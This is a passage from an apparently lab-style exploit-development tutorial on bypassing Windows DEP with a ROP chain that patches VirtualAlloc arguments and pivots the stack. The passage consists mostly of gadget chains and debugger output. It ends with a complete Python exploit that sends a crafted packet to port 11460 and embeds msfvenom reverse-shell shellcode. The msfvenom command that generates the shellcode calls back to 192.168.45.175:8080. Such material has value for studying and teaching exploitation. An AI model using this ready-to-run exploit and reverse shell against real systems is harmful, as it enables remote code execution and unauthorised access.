
However, we know that the shellcode is located in the same stack, only several bytes (offset) away from our current position. Therefore, our approach is as follows:

Take the current stack position by copying the address in ESI into another register as the calculation base.
Calculate the offset by adding the offset distance to that register so it points to the shellcode.
Patch and write the result back to the location pointed by ESI.

ROP Chain Implementation

First, we need a gadget to move the value from ESI to another register and found this gadget which works perfectly for our plan

CODE | 2

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # Padding pop esi

Since this gadget copies the value into EAX, we’ll use EAX as our base for calculating the shellcode address.

PNG

PNG |

After EAX contains the base address, we calculate the offset by estimating that the shellcode is located 0x210 bytes away from this position. Like before, to avoid null bytes, we use the subtraction trick with a negative number (-0x210). Mathematically: EAX - (-0x210) is the same as EAX + 0x210.

CODE | 3

rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xFFFFFDF0)) # -0x210

Therefore, we use the pop ecx gadget to load the negative value -0x210 (which is 0xFFFFFDF0 in hex) into ECX.

PNG

PNG |

With the values ready in EAX and ECX, we simply subtract the ECX value from EAX using the sub eax, ecx gadget.

CODE | 1

rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret (EAX = ESI) - (-0x210) / EAX + 0x210

The final step is to overwrite the placeholder 0x46464646 on the stack with the shellcode address stored in EAX.

CODE | 1

rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

PNG

PNG |

With this final patch in place, once VirtualAlloc completes, execution will return to the address we calculated, and the program will jump straight into our shellcode.

CODE | 9

# Patching Shellcode Return Address

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # Padding pop esi
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf0)) # -0x210
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Patching VirtualAlloc Argument

After the return address is patched, the next step is to prepare or fill the four arguments (lpAddress, dwSize, flAllocationType, flProtect) required by VirtualAlloc so we can disable DEP and make the shellcode memory area executable.

Patching lpAddress

The first argument is lpAddress, which specifies the starting memory address we want to change permissions for. Since our main goal is to execute the shellcode, this argument must point to the shellcode location itself. The value will be the same as the shellcode address we used for the return address earlier.

Align ESI to lpAddress placeholder

In the previous step, the ESI register pointed to the return address position on the stack.

PNG

PNG |

Since lpAddress is located exactly 4 bytes after it, we simply shift ESI by +4 bytes using the INC ESI gadget four times again.

CODE | 6

## Align ESI to lpAddress placeholder (+4 bytes)

rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

Calculate Shellcode Address Relatively

Keep in mind that we can’t just write the shellcode address directly to the stack. So, just like we did for the return address, we have to calculate it relatively using a fixed offset. The difference is that because ESI has shifted by 4 bytes, the previous offset -0x210 must be adjusted to -0x20C (-0x210 + 0x4 = -0x20C).

PNG

PNG |

This new offset is then used to calculate the correct shellcode address relative to the current register value. We can implement this adjustment with the following ROP chain:

CODE | 12

## Copy ESI to EAX

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # junk

## Load adjusted negative offset (-0x20C) to ECX
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf4)) # -0x20c

## Calculate final shellcode address (EAX = EAX - ECX)
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret

With the gadget chain above, the offset value -0x20C is used to correct the register shift, ensuring the resulting shellcode address remains accurate even though the register position has changed.

PNG

PNG |

Patch lpAddress with Shellcode Address

Currently, the EAX register already holds the shellcode address. The final step is patching that value into the stack at the lpAddress parameter position. To do this, we use the following gadget:

CODE | 2

# Patch lpAddress with Shellcode Address (from EAX)
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

This gadget copies the value from EAX to the address pointed to by ESI. Since we previously directed ESI to the lpAddress placeholder, this instruction will replace the placeholder value 0x47474747 with the actual shellcode address.

To ensure the patching process runs correctly, we update the exploit, run it again in the debugger, and set a breakpoint at the relevant location.

PNG

PNG |

From the debugger result, we can see that the lpAddress placeholder was successfully patched to the shellcode address just as we wanted.

Patching dwSize

The second argument of VirtualAlloc is dwSize, which is the size of the memory to be allocated. This value can be chosen between 0x1 and 0x1000, as long as our shellcode size does not exceed 0x1000 bytes (the size of a standard memory page).

However, writing 0x00000001 directly to the stack is not possible due to the null byte. To solve this, we reuse the two’s complement approach with a NEG operation. Mathematically, this process is equivalent to:

CODE | 2

0:062> ? 0 - 0xffffffff
Evaluate expression: -4294967295 = ffffffff`00000001

Align ESI to dwSize placeholder

Before we handle the value, we need to make sure our write pointer (ESI) is in the right position. ince the dwSize argument is located exactly 4 bytes above the previous argument (lpAddress), we need to shift ESI up by 4 bytes using the same INC ESI gadget as in the previous step.

CODE | 5

## Align ESI to dwSize placeholder (+4 bytes)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

Patching dwSize with Calculated Value

Now that ESI points to the dwSize location, it is time to prepare the value 1 in the EAX register without including null bytes. The strategy is to load the value -1 (0xFFFFFFFF) into EAX, then run the neg eax instruction to turn it into 1. Once the value is ready, we write it to the address pointed to by ESI.

Here is the ROP chain implementation for that logic:

CODE | 6

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret  
rop += pack("<L", (0xffffffff)) # -1 into EAX
rop += pack("<L", (0x50527840)) # neg eax ; ret →  EAX=0x1

## Patch dwSize placeholder with EAX
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret  → Write 0x1 to dwSize

In the debugger, once the neg eax instruction is executed, the EAX register will successfully change to 00000001.

PNG

PNG |

The final part of the gadget above is copying that value to the position pointed to by ESI in the stack.

PNG

PNG |

To verify the result, we can check the stack condition after this ROP chain is executed using the command dds esi -c L5 in WinDbg. The check shows that at the dwSize offset, the value has changed to 00000001, which means the dwSize argument was successfully patched.

Patching flAllocationType

The third argument is flAllocationType, the value for this argument must be set to 0x1000 (MEM_COMMIT), which instructs Windows to commit the memory pages so they can be used to store and execute the shellcode.

The Limitation of Negation Technique

Here, we face a slightly different situation compared to patching dwSize. We cannot use the NEG (two’s complement) approach used previously. If we use this method, the result of the subtraction will contain a null byte.

CODE | 2

0:062> ? 0 - 1000
Evaluate expression: -4096 = fffff000

Therefore, to avoid null bytes, we pick two large, “clean” numbers (containing no null bytes) and add them together to reach the final result of 0x1000.

PNG

PNG |

Based on the calculation above, both numbers are free of null byte. When summed: 0x80808080 + 0x7f7f8f80 = 0x00001000. The lower 32-bit result perfectly matches our needs: 0x1000.

Align ESI to flAllocationType Placeholder

Before we start calculating, we must shift the ESI pointer again to point to the third argument position on the stack. Since this position is 4 bytes away from the previous argument (dwSize), we use the INC ESI gadget four times again.

CODE | 5

## Align ESI +4 to point to flAllocationType placeholder
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7))
rop += pack("<L", (0x50522fa7))
rop += pack("<L", (0x50522fa7))

Calculate Value 0x1000 via Addition

Next, we implement the addition logic into our ROP chain. We use the EAX and ECX registers to hold the two “safe” values we picked, and then add them together.

CODE | 10

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe value 1 (null byte)

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f8f80)) # Safe value 2 (Complement to reach 0x1000)

# Perform calculation: EAX = EAX + ECX -> Result = 0x1000
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

Patch flAllocationType with Calculated Value

The final step for this argument is to move the calculated value from EAX into the stack, specifically at the location pointed to by ESI.

CODE | 2

# Write the calculated value (0x1000) to the flAllocationType placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

The mov dword ptr [esi], eax gadget instruction will overwrite the flAllocationType placeholder value in the stack with the value 0x1000.

The instruction mov dword ptr [esi], eax will overwrite the flAllocationType placeholder on the stack with the value 0x1000. Below is the full ROP chain for patching flAllocationType:

CODE | 22

# Patching flAllocation

## Align ESI +4 to point to flAllocationType placeholder
rop += pack("<L", 0x50522fa7) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe value 1 (No null bytes)

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f8f80)) # Safe value 2 (Complement to reach 0x1000)

## Perform calculation 
## Add EAX + ECX -> Result = 0x1000
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Write the calculated value (0x1000) to the flAllocationType placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Run our updated skeleton script. In the debugger, when the add eax, ecx instruction is executed, the EAX register successfully changes to 00001000.

PNG

PNG |

By inspecting the memory using the dds esi -c L5 command, we can see that the offset for flAllocationType has changed from 00000000 to 00001000. This indicates that the flAllocationType argument has been successfully patched with the MEM_COMMIT value. Next stage, we only need to handle one last argument.

Patching flProtect

The fourth or final argument of VirtualAlloc is flProtect. This argument is crucial as it determines or set the memory access permissions we want. We must set it to 0x40, which is the constant for PAGE_EXECUTE_READWRITE. This permission tells Windows that the memory area containing the shellcode can be read, written to, and most importantly executed.

PNG

PNG |

Just like before, we can’t send 0x00000040 directly to the stack because it contains null bytes. Therefore, we apply the arithmetic addition (ADD) strategy again with two large “clean” numbers.

Align ESI to flProtect Placeholder

Currently, ESI points to flAllocationType, so we need to shift it up more 4 bytes to reach the flProtect placeholder.

CODE | 5

# Align ESI +4 to point to flProtect placeholder
rop += pack("<L", 0x50522fa7) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)
rop += pack("<L", 0x50522fa7)

Calculate Value 0x40 via Addition

Once the pointer is ready, we load the two “safe” values into the registers and sum them using a similar gadget, adjusting the complement value so the final result becomes 0x40.

CODE | 10

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe Value 1

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f7fc0)) # Safe Value 2 (Complement for 0x40)

## Add EAX + ECX -> Result = 0x40
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

PNG

PNG |

Patch flProtect with Calculated Value

After the ADD instruction is executed, the EAX register now holds a clean 0x40 value. We just need to move the calculation result from EAX into the stack at the location pointed to by ESI.

CODE | 2

## Write the calculated value (0x40) to the flProtect placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

This instruction will overwrite the flProtect placeholder in the stack with the value 0x00000040. With this, all VirtualAlloc arguments are complete and ready to go.

Summary of Patched

Based on the WinDbg check, all arguments are now correctly filled

lpAddress: Shellcode address
dwSize: 0x1 (One memory page)
flAllocationType: 0x1000 (MEM_COMMIT)
flProtect: 0x40 (PAGE_EXECUTE_READWRITE)

With these four arguments done, VirtualAlloc will change the protection of the memory page where the shellcode is located, making it executable. The next step is that execution will be fully handed over to the shellcode to finish the exploitation process.

Here is the full ROP chain for patching flProtect:

CODE | 22

## Align ESI to point to flProtect placeholder
## Move ESI 4 bytes up from the previous argument (flAllocationType)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

## Load the first clean value into EAX
rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe Value 1

## Load the second clean value into ECX
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f7fc0)) # Safe Value 2 (Complement for 0x40)

## Calculation & Patchin
## Add EAX + ECX -> Result = 0x40
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret


## Write the calculated value (0x40) to the flProtect placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

Return to VirtualAlloc

After dynamically patching the four VirtualAlloc arguments into the stack, our final task is to perform a stack pivot. However, before we change the ESP value to point to our controlled area, we must align the pointer so that ESP lands exactly at the start of the VirtualAlloc structure we have set up.

Calculate the Offset to VirtualAlloc

Similar to previous steps, we need to determine how far to shift our reference pointer. Currently, the closest reference we have is the ESI register.

By checking memory using the offset from ESI, it appears the VirtualAlloc structure is located 20 bytes above the current ESI position (mathematically, the offset is -0x14).

PNG

PNG |

However, we will not use this offset directly. The reason is that the gadget we will use for the stack pivot later contains a pop ebp instruction. Every time this instruction runs, it automatically shifts the stack pointer (ESP) up by +4 bytes. TTherefore, we must compensate by adding a distance of 4 bytes to our base offset, making the total 24 bytes. So, the final offset value we will use is -24 (or 0xffffffe8 in hexadecimal).

Since we need to do some math arithmetic operations again to apply this offset, we must copy the pointer value stored in ESI back to EAX. At this stage, we can reuse the gadget we used earlier to do this.

CODE | 10

# Move ESI to EAX to start calculation
rop += pack("<L", (0x5050118e)) # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # junk (filler for pop esi)

# Load negative offset into ECX 
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe8)) # negative offset (-24 bytes)

# Calculate Target Address (EAX + ECX) ---
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

If we look at the execution result of the code above in the debugger, after add eax, ecx is executed, EAX will hold the address 0x0d49e2fc. This address is exactly at the position (41414141) located precisely above VirtualAllocStub.

PNG

PNG |

This proves our calculation is correct. The pop ebp instruction later, which we will use during the stack pivot, will throw away that junk value, and ESP will land right on target.

Executing the Stack Pivot

Once the offset calculation is complete, the destination address that has been compensated is now in the EAX register. The next step is to move that address to ESP, this is the moment the actual stack pivot happens.

After searching for available gadgets, we found a sequence that uses EBP as an intermediary. The approach swaps the value from EAX to EBP first, and then copies EBP to ESP. This is where the offset compensation function works.

first swapping EAX into EBP, then copying EBP to ESP. This is where the offset compensation we calculated earlier pays off.

CODE | 5

## # Move Target Address from EAX to EBP
rop += pack("<L", (0x5051571f)) # xchg eax, ebp ; ret

## Move EBP to ESP (Stack Pivot)
rop += pack("<L", (0x50533cbf)) # mov esp, ebp ; pop ebp ; ret

When the mov esp, ebp instruction executes, ESP will point to the address 0x0d49e2fc (the location of the junk value). However, the pop ebp instruction that follows will take that junk value from the stack and automatically increment ESP by 4 bytes-shifting it from 0d49e2fc to 0d49e300.

The image below shows how the EBP and ESP registers change step-by-step as the gadget execution.

PNG

PNG |

This shift corrects the ESP position from -24 to -20, so the pointer lands precisely at the start address of the VirtualAlloc structure just before the RET instruction is executed.

Verifying Memory Protection

Before proceeding, we need to verify if VirtualAlloc actually worked. The best way is to check the memory protection status at the shellcode address before and after the API call.

Observe the debugger output below when the execution is at the VirtualAllocStub (before the function runs):

PNG

PNG |

Before execution, the shellcode address (0x0d44e514) still has the PAGE_READWRITE (0x04) status. This means the memory is currently only readable and writable, but not executable. If we force the shellcode to run now, the program will crash due to DEP (Data Execution Prevention).

After we let VirtualAlloc finish executing, we check the status again at the same address:

PNG

PNG |

As shown in the image above, the protection status has changed to PAGE_EXECUTE_READWRITE (0x40). This confirms we successfully bypassed the DEP protection mechanism to run our shellcode later.

Getting a Reverse Shell

Once VirtualAlloc finishes execution and the memory protection has successfully changed to RWX, the function will return to the address we specified in the lpAddress argument. However, we cannot just put the shellcode right there because that area is still used by the ROP chain that just was executed. If we don’t give some space, the execution will fall into junk instructions and cause a crash.

Therefore, we need to calculate the offset and insert some padding bytes after the ROP chain and before the shellcode. To find the number of padding bytes needed, we let the debugger run until the VirtualAlloc function finishes returning.

PNG

PNG |

After that, we calculate the difference between the return address (0d44e514) and the end position of the ROP chain on the stack (0d44e434).

CODE | 2

0:062> ? 0d44e514 - 0d44e434
Evaluate expression: 224 = 000000e0

This calculation shows that we need exactly 224 bytes (0xE0) of padding. We can now update our Proof of Concept (PoC) by adding this padding before the shellcode.

CODE | 23

# Executinvg VirutalAlloc
## Move ESI to EAX to start calculation
rop += pack("<L", (0x5050118e)) # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # junk (filler for pop esi)

rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe8)) # negative offset (-24 bytes)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Move Target Address from EAX to EBP
rop += pack("<L", (0x5051571f)) # xchg eax, ebp ; ret

## Move EBP to ESP (Stack Pivot)
rop += pack("<L", (0x50533cbf)) # mov esp, ebp ; pop ebp ; ret

# Padding to bridge ROP chain and shellcode
padding = b"C" * 0xe0

# Initial test with INT3 (0xCC)
shellcode = b"\xcc" * (0x400 - 276 - 4 - len(rop) - len(padding))

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+va+eip+rop+padding+shellcode,0,0,0,0)
buf += formatString

Verifying the Jump to Shellcode

After updating the script, we rerun the exploit and set a breakpoint at KERNEL32!VirtualAllocStub in the debugger to monitor the flow.

PNG

PNG |

Let the program pass through VirtualAlloc. If our padding calculation is correct, the execution should land smoothly on our INT3 (breakpoint) instructions without triggering an Access Violation.

PNG

PNG |

As shown in the image above, EIP successfully executed the INT3 sequence. This proves that the execution flow from the ROP chain to the shellcode is perfectly aligned. This proves that the execution flow from the ROP chain to the shellcode is perfectly aligned and so far, no violations have occurred, which means we have successfully bypassed DEP.

Expanding the Buffer for the Reverse Shell

The final step is to insert the actual shellcode. Before doing so, we must check the remaining space available in our buffer. A standard reverse shell shellcode usually requires a significant amount of space. We can check the remaining space in the debugger by calculating the distance from the current EIP to the end of the buffer.

PNG

PNG |

From the calculation above (0d53e609 - eip), we only have 240 bytes of space left. This is likely insufficient for a staged reverse shell payload.

Luckily, since we have full control over the input file, we have the flexibility to increase the buffer size. We can simply increase the buffer size from 0x400 to 0x600 bytes in order to accommodate a larger payload.

CODE | 5

# psCommandBuffer
morepadding = b"\xcc" * (0x600 - 276 - 4 - len(rop) - len(padding) - len(shellcode))

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+va+eip+rop+padding+shellcode+morepadding,0,0,0,0)
buf += formatString

Generating Shellcode

Now we can generate the final shellcode using msfvenom. To ensure the exploit remains stable, we must use the -b flag to exclude the bad characters we identified earlier: \x00\x09\x0a\x0b\x0c\x0d\x20.

CODE | 1

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.175 LPORT=8080 -b "\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode

Full Chain and Reverse Shell

With the final shellcode ready, we replace the INT3 dummy payload in our script. Here is the final structure of the completed exploit:

CODE | 194

import socket
import sys
from struct import pack

# psAgentCommand
buf = bytearray([0x41]*0xC)
buf += pack("<i", 0x534)  # opcode
buf += pack("<i", 0x0)    # 1st memcpy: offset
buf += pack("<i", 0x700)  # 1st memcpy: size field
buf += pack("<i", 0x0)    # 2nd memcpy: offset
buf += pack("<i", 0x100)  # 2nd memcpy: size field
buf += pack("<i", 0x0)    # 3rd memcpy: offset
buf += pack("<i", 0x100)  # 3rd memcpy: size field
buf += bytearray([0x41]*0x8)


# Placeholder VirtualAlloc
va  = pack("<L", (0x45454545)) # [Function] Dummy VirtualAlloc Address (Akan dipatch)
va += pack("<L", (0x46464646)) # [Ret Addr] Shellcode Return Address (Jump ke shellcode setelah VirtualAlloc selesai)
va += pack("<L", (0x47474747)) # [Arg 1] Dummy lpAddress: Lokasi shellcode
va += pack("<L", (0x48484848)) # [Arg 2] Dummy dwSize: Ukuran shellcode
va += pack("<L", (0x49494949)) # [Arg 3] Dummy flAllocationType: (0x1000 / MEM_COMMIT)
va += pack("<L", (0x51515151)) # [Arg 4] Dummy flProtect: (0x40 / PAGE_EXECUTE_READWRITE)

# Adjust offset calculation 
offset = b"A" * (276 - len(va))

# Saving Extended Stack Pointer Address
eip = pack("<L", (0x50501110)) # push esp ; push eax ; pop edi; pop esi ; ret

# Obtaining and Patching VirtualAlloc Address
rop = pack("<L", (0x5050118e))  # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # Padding (Junk)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe4)) # -0x1C
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret
rop += pack("<L", (0x50537d5b)) # push eax ; pop esi ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret
rop += pack("<L", (0x5054A221)) # VirtualAlloc IAT + 1
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffff)) # -1 into ecx
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret
rop += pack("<L", (0x5051f278)) # mov eax, dword [eax] ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Patching Return Address by 4 bytes

rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

# Patching Shellcode Return Address

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # Padding pop esi
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf0)) # -0x210
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

#Patching VirtualAlloc Argument

## Patching lpAddress
### Align ESI to lpAddress placeholder (+4 bytes)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5050118e)) # mov eax, esi ; pop esi ; ret
rop += pack("<L", (0x42424242)) # junk
rop += pack("<L", (0x5052f773)) # push eax ; pop esi ; ret
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xfffffdf4)) # -0x20c
rop += pack("<L", (0x50533bf4)) # sub eax, ecx ; ret
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

## Patching dwSizew
### Align ESI to dwSize placeholder (+4 bytes)
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret  
rop += pack("<L", (0xffffffff)) # -1 into EAX
rop += pack("<L", (0x50527840)) # neg eax ; ret →  EAX=0x1
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret  → Write 0x1 to dwSize


# Patching flAllocation
## Align ESI +4 to point to flAllocationType placeholder
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe value 1 (no null byte)
rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f8f80)) # Safe value 2 (Complement to reach 0x1000)

## Perform calculation: EAX = EAX + ECX -> Result = 0x1000
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret 

## Write the calculated value (0x1000) to the flAllocationType placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Patching flProtect
## Align ESI +4 to point to flProtect placeholder
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret
rop += pack("<L", (0x50522fa7)) # inc esi ; add al, 0x2B ; ret

rop += pack("<L", (0x5053a0f5)) # pop eax ; ret 
rop += pack("<L", (0x80808080)) # Safe Value 1

rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0x7f7f7fc0)) # Safe Value 2 (Complement for 0x40)

## Add EAX + ECX -> Result = 0x40
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Write the calculated value (0x40) to the flProtect placeholder
rop += pack("<L", (0x5051cbb6)) # mov dword [esi], eax ; ret

# Executinvg VirutalAlloc
## Move ESI to EAX to start calculation
rop += pack("<L", (0x5050118e)) # mov eax,esi ; pop esi ; retn
rop += pack("<L", (0x42424242)) # junk (filler for pop esi)

rop += pack("<L", (0x505115a3)) # pop ecx ; ret
rop += pack("<L", (0xffffffe8)) # negative offset (-24 bytes)
rop += pack("<L", (0x5051579a)) # add eax, ecx ; ret

## Move Target Address from EAX to EBP
rop += pack("<L", (0x5051571f)) # xchg eax, ebp ; ret

## Move EBP to ESP (Stack Pivot)
rop += pack("<L", (0x50533cbf)) # mov esp, ebp ; pop ebp ; ret

# Padding to bridge ROP chain and shellcode
padding = b"C" * 0xe0

# Shellcode Reverse Shell
shellcode =  b""
shellcode += b"\xba\xfb\xc3\x47\xa4\xdb\xc8\xd9\x74\x24\xf4"
shellcode += b"\x58\x29\xc9\xb1\x52\x83\xc0\x04\x31\x50\x0e"
shellcode += b"\x03\xab\xcd\xa5\x51\xb7\x3a\xab\x9a\x47\xbb"
shellcode += b"\xcc\x13\xa2\x8a\xcc\x40\xa7\xbd\xfc\x03\xe5"
shellcode += b"\x31\x76\x41\x1d\xc1\xfa\x4e\x12\x62\xb0\xa8"
shellcode += b"\x1d\x73\xe9\x89\x3c\xf7\xf0\xdd\x9e\xc6\x3a"
shellcode += b"\x10\xdf\x0f\x26\xd9\x8d\xd8\x2c\x4c\x21\x6c"
shellcode += b"\x78\x4d\xca\x3e\x6c\xd5\x2f\xf6\x8f\xf4\xfe"
shellcode += b"\x8c\xc9\xd6\x01\x40\x62\x5f\x19\x85\x4f\x29"
shellcode += b"\x92\x7d\x3b\xa8\x72\x4c\xc4\x07\xbb\x60\x37"
shellcode += b"\x59\xfc\x47\xa8\x2c\xf4\xbb\x55\x37\xc3\xc6"
shellcode += b"\x81\xb2\xd7\x61\x41\x64\x33\x93\x86\xf3\xb0"
shellcode += b"\x29\x87\x40\x2a\x22\x62\x66\x99\x43\xa7"

# psCommandBuffer
morepadding = b"\xcc" * (0x600 - 276 - 4 - len(rop) - len(padding) - len(shellcode))

formatString = b"File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % (offset+va+eip+rop+padding+shellcode+morepadding,0,0,0,0)
buf += formatString


# Checksum
buf = pack(">i", len(buf)-4) + buf

def main():
 if len(sys.argv) != 2:
  print("Usage: %s <ip_address>\n" % (sys.argv[0]))
  sys.exit(1)
 
 server = sys.argv[1]
 port = 11460

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((server, port))

 s.send(buf)
 s.close()

 print("[+] Packet sent")
 sys.exit(0)


if __name__ == "__main__":
  main()

Once the exploit is executed, the program will perform a stack pivot to VirtualAlloc, change the memory protection, jump over the padding, and finally execute our reverse shell.

PNG

PNG |

Defeating Windows DEP Using ROP Chains Leveraging VirtualAlloc

Maland | Saturday, February 28, 2026

Background

Technical Overview

No Mona No Problem!

Vulnerability Analysis

Vulnerability Validation

Getting the Offset

Identify Bad Characters

Identifying Modules for ROP Chain

Gadget Analysis and Extraction

Constructing The ROP Chain Skeleton

The VirtualAlloc API Prototype

Understanding the Stack Layout

Building the Skeleton in Python

Verifying Stack Layout

Preparing the Stack

Saving Extended Stack Pointer Address

Gadget Selection

Verifying the Gadget

Exploring Alternative Gadgets

Retrieving VirtualAlloc Pointer from IAT

Finding the IAT Address

Calculating the Stack Offset for VirtualAlloc

Handling Null Bytes via Negative Offsets

Implementation of the ROP Chain

Patching VirtualAlloc Addresses

Handling Bad Characters in VirtualAlloc Addresses

Loading the Modified Address

Adjust and Restoring the Address

Resolving the Function Pointer

Patching the Stack Placeholder

Patching Return Address

Aligning ESI to the Placeholder

Calculating the Shellcode Address

ROP Chain Implementation

Patching VirtualAlloc Argument

Patching lpAddress

Align ESI to lpAddress placeholder

Calculate Shellcode Address Relatively

